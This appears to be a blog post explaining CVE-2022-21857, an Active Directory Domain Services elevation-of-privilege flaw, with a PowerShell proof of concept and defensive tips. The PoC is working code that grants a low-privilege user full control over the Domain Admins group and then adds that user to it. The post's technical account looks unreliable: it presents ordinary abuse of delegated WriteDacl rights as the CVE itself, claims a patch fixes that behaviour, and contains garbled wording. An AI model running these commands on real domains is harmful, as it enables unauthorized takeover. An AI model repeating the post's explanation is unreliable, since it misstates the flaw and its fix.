CVE-2022-21857 - Breaking Down the Active Directory Domain Services Elevation of Privilege Vulnerability

In January 2022, Microsoft patched a critical security bug known as CVE-2022-21857. This vulnerability could let an attacker gain higher privileges inside a Windows network by abusing Active Directory Domain Services (AD DS). In this detailed post, let’s simplify CVE-2022-21857, dig into how it works, review some proof-of-concept (PoC) code, and talk about how real attackers could use it.

CVSS Score: 7.5 (High)

- Patched in: January 2022 Patch Tuesday update
- Short Summary: An authenticated attacker with network access can abuse certain AD operations to get higher privileges in the environment, possibly becoming Domain Admin.

Why It Matters

Active Directory runs in almost every corporate Windows network. If attackers can escalate privileges inside AD, they could gain control of other computers and data, plant persistent backdoors, and make recovery tough.

CVE-2022-21857 is especially dangerous because it doesn’t require code execution memory corruption. It’s a logic flaw attackers could exploit using legitimate AD features.

How Does CVE-2022-21857 Work?

Microsoft was careful not to publish every technical detail, but security researchers like Will Dormann explained some high-level information.

This vulnerability relates to how certain Active Directory permissions (e.g., WriteOwner or WriteDacl) can be abused to gain elevated access through improper security descriptor enforcement. In some cases, attackers can exploit miscalculations in discretionary access controls to assign themselves dangerous permissions or reset admin passwords.

In short: If an attacker has some specific permissions already (not even full admin), they can abuse AD tools to _promote_ themselves or others to Domain Admin, or take over sensitive objects.

Example Exploitation Scenario

1. Attacker has a regular AD account that’s already delegated some permission on a group or user object (like the ability to manage group memberships).
2. Abuses SetOwner or SetPermissions to assign themselves or another user ownership of an object (like the Domain Admins group).
3. Uses legitimate AD tools (like PowerShell’s Set-ADObject, Set-ACL, or dsacls) to grant full control permissions over that object.
4. Resets credentials or adds self to admins: Now, the attacker can reset an admin’s password, add themselves to Domain Admins, or give themselves persistent access.

Proof-of-Concept Exploit (PowerShell)

Here’s a sample PoC that shows how an enlisted user with limited delegation could escalate their own privileges:

# Assume attacker has "WriteDacl" on a target user/group
$targetDn = "CN=Domain Admins,CN=Users,DC=contoso,DC=com"
$attackerDn = "CN=LowPrivUser,CN=Users,DC=contoso,DC=com"

# Get the ACL for the Domain Admins group
$acl = Get-ACL "AD:$targetDn"

# Build a new access rule giving FullControl to attacker
$rule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
    $attackerDn, 
    "GenericAll", 
    "Allow"
)

# Add rule and write back
$acl.AddAccessRule($rule)
Set-ACL "AD:$targetDn" $acl

# Attacker can now add self to Domain Admins:
Add-ADGroupMember -Identity "Domain Admins" -Members "LowPrivUser"

Note: By running these commands, ANY user who has the right to modify the ACL (even just WriteDacl or WriteOwner, not full control) could grant themselves enough access to take over the domain.

Defensive Steps

Microsoft’s patch KB5009546 ensures AD properly enforces these security descriptor checks. Until updates are deployed:

- Review Delegations: Avoid granting WriteOwner or WriteDacl permissions to regular users or low-priv admin accounts.
- Audit ACLs: Use tools like BloodHound to map dangerous delegated permissions.

Learn More

- Microsoft Security Update Guide – CVE-2022-21857
- Will Dormann Twitter Thread Explaining the Flaw
- Detailed Technical Analysis on AD Security
- BloodHound: Active Directory Attack Path Mapping Tool

Final Thoughts

CVE-2022-21857 is a reminder that even legitimate features in Active Directory can be dangerous in the wrong hands, especially if misconfigured. Always keep your AD systems updated and audit who can make permission changes—those small mistakes could let attackers rule your whole domain.

If you found this breakdown helpful, share it with your IT security team and make sure CVE-2022-21857 is addressed in your environment!

Timeline

Published on: 01/11/2022 21:15:00 UTC
Last modified on: 05/23/2022 17:29:00 UTC